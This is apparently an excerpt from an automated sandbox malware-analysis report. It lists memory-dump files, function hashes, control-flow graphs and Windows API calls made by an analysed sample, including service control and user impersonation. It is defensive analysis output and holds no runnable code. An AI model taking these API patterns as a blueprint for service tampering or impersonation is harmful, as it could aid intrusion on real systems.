                                                                              • Associated: 00000003.00000002.1752639402.0000000000A1B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752655586.0000000000A20000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752673590.0000000000A21000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752689408.0000000000A23000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752705400.0000000000A2C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752723263.0000000000A31000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752741386.0000000000A39000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752758703.0000000000A3A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752777279.0000000000A42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752797046.0000000000A44000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752815495.0000000000A4C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752833047.0000000000A4F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752852198.0000000000A5E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752875919.0000000000A60000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752894349.0000000000A6C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752912346.0000000000A6D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752930924.0000000000A6E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752950281.0000000000A71000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AAD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753018423.0000000000AC4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753034854.0000000000AC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_810000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: Open$InfoNativeSystem
                                                                              • String ID:
                                                                              • API String ID: 1247124224-0
                                                                              • Opcode ID: 5ea7ffcfb6ea283d438d16f19b88aa645c7a8376fafb5299565869e47380991c
                                                                              • Instruction ID: 76f054c87251602eb98d8ed0232ea496baeba40a3802a846a030b4064f04a0f7
                                                                              • Opcode Fuzzy Hash: 5ea7ffcfb6ea283d438d16f19b88aa645c7a8376fafb5299565869e47380991c
                                                                              • Instruction Fuzzy Hash: 28315EB240410EAFEF22DF64C8497EF37B8EF16314F100426D98182951E7BA4CA4CF9A
                                                                              Function 0099897F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 19 99897f-998982 LoadLibraryA 20 998988-99898a 19->20 21 99899f-998ae1 19->21 20->21 25 998ae4 21->25 25->25
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752518317.00000000009F8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752534438.00000000009FA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752553028.00000000009FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752572028.0000000000A07000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752590096.0000000000A0B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752606576.0000000000A12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752622464.0000000000A14000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752639402.0000000000A1B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752655586.0000000000A20000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752673590.0000000000A21000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752689408.0000000000A23000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752705400.0000000000A2C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752723263.0000000000A31000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752741386.0000000000A39000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752758703.0000000000A3A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752777279.0000000000A42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752797046.0000000000A44000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752815495.0000000000A4C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752833047.0000000000A4F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752852198.0000000000A5E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752875919.0000000000A60000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752894349.0000000000A6C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752912346.0000000000A6D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752930924.0000000000A6E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752950281.0000000000A71000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AAD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753018423.0000000000AC4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753034854.0000000000AC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_810000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: `7?~
                                                                              • API String ID: 1029625771-3559238925
                                                                              • Opcode ID: 3c890f7697e7de13b9bb992f4b34b5c63d2c8a24632cc12903c22233d99d0785
                                                                              • Instruction ID: 0484136e8bb140b3ebe596033443114209d79d3dada2e8ddb78efb0d25060062
                                                                              • Opcode Fuzzy Hash: 3c890f7697e7de13b9bb992f4b34b5c63d2c8a24632cc12903c22233d99d0785
                                                                              • Instruction Fuzzy Hash: 11314FF650C700AFE301AF5AD88163AF7EAFFD9320F26492DE6C483710D67558518A67
                                                                              Function 009987F5 Relevance: 1.6, APIs: 1, Instructions: 122libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 47 9987f5-9987f9 LoadLibraryA 48 998811-998826 47->48 50 99882c-99882d 48->50 51 99882e-998830 48->51 50->51 52 998859-998979 51->52 53 998836-998858 51->53 56 99897a 52->56 53->52 56->56
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752518317.00000000009F8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752534438.00000000009FA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752553028.00000000009FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752572028.0000000000A07000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752590096.0000000000A0B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752606576.0000000000A12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752622464.0000000000A14000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752639402.0000000000A1B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752655586.0000000000A20000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752673590.0000000000A21000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752689408.0000000000A23000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752705400.0000000000A2C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752723263.0000000000A31000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752741386.0000000000A39000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752758703.0000000000A3A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752777279.0000000000A42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752797046.0000000000A44000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752815495.0000000000A4C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752833047.0000000000A4F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752852198.0000000000A5E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752875919.0000000000A60000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752894349.0000000000A6C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752912346.0000000000A6D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752930924.0000000000A6E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752950281.0000000000A71000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AAD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753018423.0000000000AC4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753034854.0000000000AC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_810000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 97d4b898845dbf9f73e068d20c740ed87559b49e9b0ad718b0da780562e6c2d2
                                                                              • Instruction ID: efcb9de454dd036fa4d3f88a5d7488ec72ac8944d4421c97538ccccf0cec4813
                                                                              • Opcode Fuzzy Hash: 97d4b898845dbf9f73e068d20c740ed87559b49e9b0ad718b0da780562e6c2d2
                                                                              • Instruction Fuzzy Hash: F93184F640C210AFE705AF59E88167AFBE8FB95370F124D2DE5D5D2210E63548449BA3
                                                                              Function 04B30D41 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 57 4b30d41-4b30d97 59 4b30d99-4b30d9c 57->59 60 4b30d9f-4b30da3 57->60 59->60 61 4b30da5-4b30da8 60->61 62 4b30dab-4b30dda OpenSCManagerW 60->62 61->62 63 4b30de3-4b30df7 62->63 64 4b30ddc-4b30de2 62->64 64->63
                                                                              APIs
                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04B30DCD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 1889721586-0
                                                                              • Opcode ID: a4b8fee974e26ba0f33ca61513af8d2f5b25e489041596dc5c18a97a95987bec
                                                                              • Instruction ID: 364091043c078d765fc8e2332adae7add4b4713dccbe62dd7119fcb6524a64e4
                                                                              • Opcode Fuzzy Hash: a4b8fee974e26ba0f33ca61513af8d2f5b25e489041596dc5c18a97a95987bec
                                                                              • Instruction Fuzzy Hash: B32107B6C012199FCB50DF9AD885ADEFBF0EF88310F14815AD918AB244D774A541CFA5
                                                                              Function 04B30D48 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 66 4b30d48-4b30d97 68 4b30d99-4b30d9c 66->68 69 4b30d9f-4b30da3 66->69 68->69 70 4b30da5-4b30da8 69->70 71 4b30dab-4b30dda OpenSCManagerW 69->71 70->71 72 4b30de3-4b30df7 71->72 73 4b30ddc-4b30de2 71->73 73->72
                                                                              APIs
                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04B30DCD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 1889721586-0
                                                                              • Opcode ID: 282969dde4cc58654a888c2990572cace9527572a99ca47e51dd9cb7288b94b3
                                                                              • Instruction ID: ed9779231b13594bafaf1564917a514f87d035c73273c104e61a7793e9e1787a
                                                                              • Opcode Fuzzy Hash: 282969dde4cc58654a888c2990572cace9527572a99ca47e51dd9cb7288b94b3
                                                                              • Instruction Fuzzy Hash: 682115B6C012199FCB10DF9AD885BDEFBF4EF88310F14825AD908AB244D734A541CFA4
                                                                              Function 04B31509 Relevance: 1.6, APIs: 1, Instructions: 56serviceCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 75 4b31509-4b31550 76 4b31558-4b3158d ControlService 75->76 77 4b31596-4b315b7 76->77 78 4b3158f-4b31595 76->78 78->77
                                                                              APIs
                                                                              • ControlService.ADVAPI32(?,?,?), ref: 04B31580
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ControlService
                                                                              • String ID:
                                                                              • API String ID: 253159669-0
                                                                              • Opcode ID: 45db9b5d5230ac2035db0c5beacd0771eda1a049ab04240dee609210aeefff8e
                                                                              • Instruction ID: aafbd960fc768285ee4d50f8a22984b2371e66bef19a22a87b265913542ff2d8
                                                                              • Opcode Fuzzy Hash: 45db9b5d5230ac2035db0c5beacd0771eda1a049ab04240dee609210aeefff8e
                                                                              • Instruction Fuzzy Hash: 8D2106B1D002499FDB10CF9AC585BDEFBF4EB48320F108029E958A7240D778A645CFA5
                                                                              Function 04B31510 Relevance: 1.6, APIs: 1, Instructions: 54serviceCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 80 4b31510-4b3158d ControlService 82 4b31596-4b315b7 80->82 83 4b3158f-4b31595 80->83 83->82
                                                                              APIs
                                                                              • ControlService.ADVAPI32(?,?,?), ref: 04B31580
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ControlService
                                                                              • String ID:
                                                                              • API String ID: 253159669-0
                                                                              • Opcode ID: e0566c723ac8251af771a0aacd6d5ea157d87dbefb0696324911093a19cd6241
                                                                              • Instruction ID: ad8addbe5bf3c642320e70ebab73dc1974ef8a133b8d2e38e8e4ac6c34f39b39
                                                                              • Opcode Fuzzy Hash: e0566c723ac8251af771a0aacd6d5ea157d87dbefb0696324911093a19cd6241
                                                                              • Instruction Fuzzy Hash: 0F11E7B5D003499FDB10CF9AC545BDEFBF4EB48320F148029E559A3250D778A545CFA5
                                                                              Function 04B31301 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 85 4b31301-4b31341 86 4b31349-4b31374 ImpersonateLoggedOnUser 85->86 87 4b31376-4b3137c 86->87 88 4b3137d-4b3139e 86->88 87->88
                                                                              APIs
                                                                              • ImpersonateLoggedOnUser.KERNELBASE ref: 04B31367
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ImpersonateLoggedUser
                                                                              • String ID:
                                                                              • API String ID: 2216092060-0
                                                                              • Opcode ID: 458c4af769dd5843c27f0441496671944753ae4cb406947256d827de54b296dc
                                                                              • Instruction ID: 32b2772f46d47f7f9cf49520c9dc51e617cc7cd81dd0816a17117f97f5cd71ac
                                                                              • Opcode Fuzzy Hash: 458c4af769dd5843c27f0441496671944753ae4cb406947256d827de54b296dc
                                                                              • Instruction Fuzzy Hash: C81125B1C00249CFDB20DF9AD445BEEFBF4EB48320F14846AD568A3240D778A985CFA5
                                                                              Function 04B31308 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 90 4b31308-4b31374 ImpersonateLoggedOnUser 92 4b31376-4b3137c 90->92 93 4b3137d-4b3139e 90->93 92->93
                                                                              APIs
                                                                              • ImpersonateLoggedOnUser.KERNELBASE ref: 04B31367
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1754725679.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4b30000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: ImpersonateLoggedUser
                                                                              • String ID:
                                                                              • API String ID: 2216092060-0
                                                                              • Opcode ID: c77eb522ab3d8957c68dd4b5408c124387b92b77d1d32087041826e2b8b5fed1
                                                                              • Instruction ID: 93da2038dd0e423e0b31b374ed641090ae0d689d66dabf87e2b84c4fd7016a53
                                                                              • Opcode Fuzzy Hash: c77eb522ab3d8957c68dd4b5408c124387b92b77d1d32087041826e2b8b5fed1
                                                                              • Instruction Fuzzy Hash: 4E1136B1800349CFDB20CF9AC845BDEFBF8EB48320F14846AD558A3240C778A944CFA5
                                                                              Function 009A8ED0 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 95 9a8ed0-9a8ed6 LoadLibraryA
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
